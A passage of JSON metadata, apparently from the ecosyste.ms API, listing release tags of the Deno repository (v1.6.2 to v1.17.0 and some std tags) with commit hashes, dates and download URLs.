1f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind"